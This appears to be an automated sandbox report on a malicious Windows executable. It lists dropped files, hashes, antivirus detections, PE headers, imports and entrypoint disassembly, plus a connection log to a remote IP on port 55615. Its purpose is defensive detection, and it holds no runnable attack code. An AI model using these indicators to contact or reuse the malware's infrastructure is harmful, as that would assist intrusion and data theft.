SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD909.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD919.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC18.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC29.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC3A.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC4A.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC5B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC6B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEC7C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	743944
Entropy (8bit):	7.615457036874597
Encrypted:	false
SSDEEP:	12288:Sxtg61jjk0LAta9A15fraDI+Jpaf6F+CfdGoZ8LFCSz4vtwD/zxmkR:wg61jjk0LAta9A+DIMaf6MCF18LXz
MD5:	86F98523CEB67DF5CC3431A839F63134
SHA1:	160A60824E1ADC4C0FFD5959341C6DAE4DA2E76B
SHA-256:	0E43D560502493DFADE28C5822081232EE47FD42C233F9FF473C467E51297E27
SHA-512:	CD6D79DBF6E8EC3663570F584760DB9AC50E190B4CC6E12630CB31796A88912B26556B08E01E803D3EC06874263FBDEB9AC73C8C5CD67E2749D32EBA7A23C7B7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 58%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.gf..............0..............#... ...@....@.. ....................................@.................................."..O....@..L............$...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......."..............@..B................."......H.......P...."..........P...p+...........................................0..\........(.....(.....{....r...po.....{....r...p(.......(.......(....rC..p(....o.....{....r...po....br...p( ...&.{.....o!.....("...z.,..{....,..{....o#.....($....0...........s%...}.....s&...}.....s'...}.....s(...}.....s%...}.....{....o)....(*....{.....o+....{....r-..p"..@A.. ....s,...o-....{.... ......s....o/....{....r?..po0....{.....9..s1...o2....{.....o3....{....rU..po.....{.....o+....{....r-..p"

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.781604734274106
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	w4XFffGDz1.exe
File size:	920'266 bytes
MD5:	2185ecde5380054ad075b7a25ae0ea51
SHA1:	caa1b832574fc3050af5f97b6deabc21398b5c47
SHA256:	e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
SHA512:	f31d6c4fc0b4533c0538975518a1ff703c9a62ffdb072570942245725d375b9ef27f0d65a37e3ed07cd52a11def9893c8c3e7d0edc884c5c9b602af61ad8e211
SSDEEP:	24576:bCdL4E+j8SmRREbtuLD4DIvu18fplg+zQWxu5y0:bcL4/ruqbtuLMDQh58
TLSH:	6E15122277D58832C2F322371975A3925A3CB8715F238ACB93E429ADEF359C19931753
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y...y...y....~..y....\|.!y....}..y..+.r..y..+....y..+....y..+....y.......y.......y...y...x..%....y..%....y..%.p..y..%....y.

File Icon


Icon Hash:	3570b480858580c5

Static PE Info

General

Entrypoint:	0x41d000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x65DC537F [Mon Feb 26 09:01:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	10b73c5f7fc148e21f974da703236659

Entrypoint Preview

Instruction
call 00007F0D08DBDC21h
jmp 00007F0D08DBD58Dh
int3
int3
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F0D08DBCCEFh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F0D08DBCCD9h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F0D08DBC711h
push 0043BF68h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F0D08DBE447h
int3
jmp 00007F0D08DC3D4Ch
push ebp
mov ebp, esp
and dword ptr [0045B89Ch], 00000000h
sub esp, 24h
or dword ptr [0043E770h], 01h
push 0000000Ah
call dword ptr [0043218Ch]
test eax, eax
je 00007F0D08DBD8C2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp+00h], eax

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3cef0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cf24	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x62f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x64000	0x2f38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a020	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x3a080	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x346f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x24c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c4fc	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3023c	0x30400	eab8c49347b2363b3fdd36257b1df951	False	0.5767132852979274	data	6.682129404058095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xbc34	0xbe00	e5f2fdc4aee2f1a0726781d86b4f8c02	False	0.4407483552631579	data	5.126576177856284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x1df78	0x1200	94ebd057e10782ee3aa0d3ba58c1a1bf	False	0.3856336805555556	DOS executable (block device driver w{\362ko\3050)	3.9129841433728263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x5c000	0x17c	0x200	f6f8a7d940bc508fbb3b807359e5a063	False	0.42578125	data	3.261134286324671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5d000	0x62f8	0x6400	274f8184ed0865c3a4e3309a06e7038d	False	0.6695703125	data	6.732052947212191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x64000	0x2f38	0x3000	83735fea8ebd9a3faee82aa0e6812001	False	0.7744140625	data	6.687384285279319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x5d554	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x5e09c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x5f648	0x162c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.906800563777308
RT_DIALOG	0x60c74	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x60efc	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x61038	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x61124	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x61254	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6158c	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x617e0	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x619c4	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x61b90	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x61d48	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x61e90	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x622fc	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x62464	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x625b8	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x626c4	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x62780	0x1c0	data	English	United States	0.5178571428571429
RT_STRING	0x62940	0x250	data	English	United States	0.44256756756756754
RT_GROUP_ICON	0x62b90	0x14	data			1.05
RT_MANIFEST	0x62ba4	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	VariantClear, SysFreeString, SysAllocString
gdiplus.dll	GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdiplusShutdown, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2024 20:22:13.592211962 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.597270966 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:13.597446918 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.614931107 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.619968891 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:13.962301016 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.968107939 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:14.436089039 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:14.477663040 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.484477043 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.484569073 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.489763975 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.489794970 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746203899 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746267080 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746320963 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746330023 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.746356964 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746387005 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746412992 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.790283918 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.549530029 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.554758072 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:20.554884911 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.564523935 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.569586039 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:20.915374994 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.920666933 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:21.384052038 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:21.430783987 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.916909933 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.917320013 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.922207117 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.922521114 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.922700882 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.922755003 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.923113108 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.923113108 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928051949 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928081989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928103924 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928132057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928152084 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928159952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928189039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928208113 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928220987 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928252935 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928339005 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928366899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928416967 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.932372093 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.932456970 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.932457924 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.932507992 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933129072 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933177948 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933181047 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933207989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933255911 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933264017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933284998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933314085 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933339119 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933495045 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.974293947 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.974421024 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.022219896 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.022274017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.070172071 CEST	55615	49720	45.137.22.67	192.168.2.5
